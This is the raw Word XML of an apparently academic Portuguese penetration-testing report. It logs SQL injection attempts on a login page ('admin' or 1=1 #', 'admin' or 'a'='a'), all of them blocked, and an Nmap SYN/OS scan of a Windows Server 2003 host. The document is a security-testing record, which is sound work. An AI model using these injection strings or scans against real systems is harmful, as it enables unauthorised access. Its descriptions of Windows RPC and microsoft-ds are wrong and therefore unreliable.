      <w:r w:rsidR="00384949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741DB" w:rsidRDefault="004741DB" w:rsidP="003849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741DB" w:rsidRDefault="004741DB" w:rsidP="003849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741DB" w:rsidRDefault="004741DB" w:rsidP="003849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F15F82" w:rsidRDefault="00384949" w:rsidP="003849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4.3.1.4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Tela Login - Exploração via SQL Injection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Tarefa realizada dia 07/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="005A089C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: 1 hora e 40 minutos.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Submeter entradas maliciosas no sistema através de injeção de</w:t>
      </w:r>
      <w:r w:rsidR="00384949">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> códigos SQL na página de Login. Então, atra</w:t>
      </w:r>
      <w:r w:rsidR="00384949">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vés de uma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="00930BEA" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>essão de teste</w:t>
      </w:r>
      <w:r w:rsidR="00930BEA" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00384949">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00930BEA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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>forçar ações não autorizadas no sistema.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48383A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1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F40A0" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="003F40A0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Verificar se o campo Login é vulnerável a injeção de código SQL fazendo uso da técnica de concatenação de aspas simples.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="003F40A0" w:rsidP="003F40A0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Entrada: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F40A0" w:rsidRPr="00F15F82" w:rsidRDefault="003F40A0" w:rsidP="003F40A0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36925" w:rsidRPr="00F15F82" w:rsidRDefault="003F40A0" w:rsidP="003F40A0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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00C36925" w:rsidP="003F40A0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spera-se que o sistema realize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o tratamento do caractere aspa simples como um parâmetro regular da consulta.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F40A0" w:rsidRDefault="005967D5" w:rsidP="003F40A0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F15F82" w:rsidRDefault="00D76012" w:rsidP="003F40A0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. A aplicação realizou o tratamento de dados de entrada e não permitiu a injeção de instruções SQL através do campo de Login.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48383A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2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Default="008C6DC7" w:rsidP="00765ACB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Inserir um texto com uma distribuição adequada de aspa simples e comentários inline [8,9 e 10] como entrada no campo Login, a fim de modificar a instrução SQL utilizada pelo sistema na </w:t>
      </w:r>
      <w:r w:rsidR="00765ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>consulta de dados referentes ao</w:t>
      </w:r>
      <w:r w:rsidR="00765ACB" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s usuários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cadastrados. Comentários inline </w:t>
      </w:r>
      <w:r w:rsidR="00765ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>serão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utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB" w:rsidRPr="00F15F82" w:rsidRDefault="00765ACB" w:rsidP="00765ACB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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Entradas: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB" w:rsidRPr="00F15F82" w:rsidRDefault="00765ACB" w:rsidP="00765ACB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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">admin’ or 1=1 #   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB" w:rsidRPr="00F15F82" w:rsidRDefault="00765ACB" w:rsidP="00765ACB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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">admin’ or 1=1  -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB" w:rsidRPr="00F15F82" w:rsidRDefault="00765ACB" w:rsidP="00765ACB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067BC" w:rsidRPr="00F15F82" w:rsidRDefault="00765ACB" w:rsidP="00765ACB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7067BC" w:rsidRPr="00F15F82" w:rsidRDefault="007067BC" w:rsidP="00765ACB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spera-se que a aplicação realize o devido</w:t>
      </w:r>
      <w:r w:rsidR="009F24CC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tratamento para impedir que as instruções de </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>comentários</w:t>
      </w:r>
      <w:r w:rsidR="009F24CC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> não sejam interpretada</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009F24CC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="009F24CC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>como comentários inline</w:t>
      </w:r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765ACB" w:rsidRDefault="005967D5" w:rsidP="00765ACB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F15F82" w:rsidRDefault="00D76012" w:rsidP="00765ACB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. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados. 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741DB" w:rsidRDefault="004741DB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F15F82" w:rsidRDefault="0048383A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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594AD8" w:rsidRPr="00F15F82" w:rsidRDefault="00594AD8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4741DB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Inserir um texto fazendo uso de uma única aspa simples para completar a entrada de uma possível instrução SQL executada no momento do login no sistema. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00765ACB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ntradas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00765ACB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admin’ or ‘a’=’a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="004E230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ab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E2307" w:rsidRPr="00F15F82" w:rsidRDefault="004E2307" w:rsidP="00765ACB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</w:t>
      </w:r>
      <w:r w:rsidR="00765ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> esperado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="004E2307" w:rsidP="00765ACB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spera-se que o sistema realize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o tratamento de todos os caracteres informados como parâmetros regulares da consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB" w:rsidRDefault="005967D5" w:rsidP="00765ACB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F15F82" w:rsidRDefault="00D76012" w:rsidP="00765ACB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. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F31428" w:rsidRDefault="00F31428" w:rsidP="00AC10D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pt"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F3154F" w:rsidRDefault="00F3154F" w:rsidP="00AC10D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pt"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F3154F" w:rsidRDefault="00F3154F" w:rsidP="00AC10D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pt"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F3154F" w:rsidRDefault="00F3154F" w:rsidP="00AC10D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pt"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F3154F" w:rsidRPr="00F15F82" w:rsidRDefault="00F3154F" w:rsidP="00AC10D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pt"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F31428" w:rsidRPr="00F3154F" w:rsidRDefault="008C6DC7" w:rsidP="00630433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3154F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iteração 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3154F" w:rsidRPr="00F3154F" w:rsidRDefault="00F3154F" w:rsidP="00F3154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F15F82" w:rsidRDefault="00F31428" w:rsidP="00F315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4.3.2.1</w:t>
      </w:r>
      <w:r w:rsidR="00A83EB9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966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Atividade: a</w:t>
      </w:r>
      <w:r w:rsidR="008C2F72" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nálise do s</w:t>
      </w:r>
      <w:r w:rsidR="00A83EB9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ervidor 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via Nmap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Tarefa realizada no dia 09/04/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="005A089C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: 1 hora.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Utilizar a ferramenta Nmap</w:t>
      </w:r>
      <w:r w:rsidR="00F31428">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, abordada no subcapítulo 3.2,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para descobrir portas abertas no servidor e que </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>atividade</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> maliciosa</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pode</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ser desenvolvida</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a partir disso.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A83EB9" w:rsidP="00F315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1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left="1415" w:firstLine="1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Utilização do comando nmap -Ss -O IP_do_servidor.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E03DD" w:rsidRPr="00F15F82" w:rsidRDefault="00CE03DD" w:rsidP="0063043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“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>nmap” executa a ferramenta Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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“-Ss” permite que a ferramenta tente fazer o scan SYN do TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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“-O” permite que a ferramenta tente encontrar o sistema operacional </w:t>
      </w:r>
      <w:r w:rsidR="009B7BA9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizado pelo servidor</w:t>
      </w:r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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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IP_do_servidor informa o IP onde está hospedada a aplicação em teste.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E2307" w:rsidRPr="00F15F82" w:rsidRDefault="004E2307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4777A" w:rsidRPr="00F15F82" w:rsidRDefault="0084777A" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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Espera-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, e </w:t>
      </w:r>
      <w:r w:rsidR="00197C78" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os serviços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que estão rodando</w:t>
      </w:r>
      <w:r w:rsidR="00197C78" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> nessas portas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no momento do escaneamento.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31428" w:rsidRDefault="005967D5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Default="008C6DC7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rro na ferramenta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00A83EB9" w:rsidP="00935C82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Varredura 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2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935C82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w: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Utilização do comando nmap -sS -O IP_do_servidor.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E03DD" w:rsidRPr="00F15F82" w:rsidRDefault="00CE03DD" w:rsidP="0063043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“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>nmap” executa a ferramenta Nmap</w:t>
      </w:r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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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“-sS” permite que a ferramenta tente fazer o scan SYN do TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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“-O” permite que a ferramenta tente encontrar o sistema operacional </w:t>
      </w:r>
      <w:r w:rsidR="009B7BA9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizado pelo servidor</w:t>
      </w:r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197C78" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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IP_do_servidor informa o IP onde está hospedada a aplicação em teste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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97C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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  <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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>Espera-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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D3D74" w:rsidRPr="00F15F82" w:rsidRDefault="00F31428" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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  <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C2F72" w:rsidRPr="00F15F82" w:rsidRDefault="008C2F72" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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 xml:space="preserve">De acordo com a figura 4, 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foi possível descobrir o sistema operacional utilizado pelo servidor explorado: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Windows Server 2003.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</w:t>
      </w:r>
      <w:r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>Também foi possível descobrir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as portas abertas, e </w:t>
      </w:r>
      <w:r w:rsidR="00197C78" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>serviços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que estavam rodando</w:t>
      </w:r>
      <w:r w:rsidR="00197C78"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nessas portas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no momento do escaneamento.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54DEF" w:rsidRPr="00F15F82" w:rsidRDefault="00654DEF" w:rsidP="00F3154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11355087" wp14:editId="455EFDEB">
            <wp:extent cx="4957296" cy="35052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713" cy="350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Figura 4 - Portas encontradas e os serviços que estavam rodando nelas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001923D7" w:rsidRPr="00F15F82" w:rsidRDefault="001923D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923D7" w:rsidRPr="00F15F82" w:rsidRDefault="001923D7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Serviços </w:t>
      </w:r>
      <w:r w:rsidR="008C2F72" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00197C78" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ncontrados na figura 4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1923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E513AC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923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows RPC </w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- Ferramenta semelhante ao TeamViewer que conecta </w:t>
      </w:r>
      <w:r w:rsidR="002A5CE5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> computador criando um esquema de servidor - cliente; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E513AC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923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows microsoft-ds</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta que auxilia a implantação de imag</w:t>
      </w:r>
      <w:r w:rsidR="008C2F72" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ens em uma distribuição Windows;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E513AC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923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache httpd</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Servidor</w:t>
      </w:r>
      <w:r w:rsidR="008C2F72" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E513AC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923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows 98 netbios-ssn</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Api que fornece serviços relacionados com a camada de T</w:t>
      </w:r>
      <w:r w:rsidR="008C2F72" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ansporte do modelo OSI para permitir a co</w:t>
      </w:r>
      <w:r w:rsidR="008C2F72" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
